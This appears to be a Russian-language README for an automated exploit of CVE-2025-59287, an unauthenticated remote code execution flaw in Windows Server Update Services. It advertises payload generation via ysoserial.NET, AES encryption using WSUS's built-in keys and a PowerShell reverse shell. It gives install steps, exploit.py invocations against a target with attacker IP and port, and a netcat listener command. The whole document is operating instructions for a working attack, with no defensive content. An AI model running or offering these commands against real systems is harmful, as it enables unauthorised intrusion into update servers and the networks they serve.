
Автоматический эксплойт для CVE-2025-59287 — неаутентифицированное RCE в WSUS, включающий генерацию полезной нагрузки, прослушиватель обратной оболочки и шифрование AES с жестко заданными ключами.
Автоматизированный эксплойт для уязвимости удалённого выполнения кода без аутентификации в Windows Server Update Services (WSUS).
✅ Полностью автоматическая генерация полезной нагрузки
✅ Автоматическая загрузка зависимости ysoserial.NET
✅ Встроенный слушатель reverse shell
✅ Кроссплатформенная поддержка (Windows/Linux/Mac)
✅ Шифрование AES с использованием встроенных ключей WSUS
✅ Полезная нагрузка PowerShell reverse shell
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
Клонируйте или скачайте файлы эксплойта
cd CVE-2025-59287-exploit
Запустите эксплойт (автоматически загрузит ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
Терминал 1: Запустите слушатель netcat
nc -lvnp 4444
Терминал 2: Запустите эксплойт без встроенного слушателя
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener